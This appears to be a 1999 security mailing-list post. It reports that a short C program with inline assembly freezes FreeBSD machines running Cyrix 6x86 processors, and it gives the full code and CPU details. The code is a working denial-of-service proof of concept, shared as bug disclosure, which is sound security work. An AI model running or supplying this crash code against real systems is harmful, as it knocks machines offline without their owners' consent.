Date: Tue, 9 Feb 1999 13:14:24 +0100
From: Patrick Oonk <patrick@PINE.NL.>
To: [email protected]Subject: Cyrix crash - FreeBSD
Ragnar Hojland Espinosa [[email protected]] mailed me a
modified version of the freeze program that runs on FreeBSD:
int main()
{
asm ("foo:");
asm ("cwtl");
asm ("orl $0xe6ebe020,%eax");
asm ("jle foo");
asm ("addb %al,(%eax)");
return 0;
}
I compiled and ran it, the machine was dead.
CPU: Cyrix 6x86 (486-class CPU)
Origin = "CyrixInstead" DIR=0x2231 Stepping=2 Revision=2
Running at 150 mhz.
Patrick
--
While preceding your entrance with a grenade
is a good tactic in Quake, it can lead to problems
if attempted at work.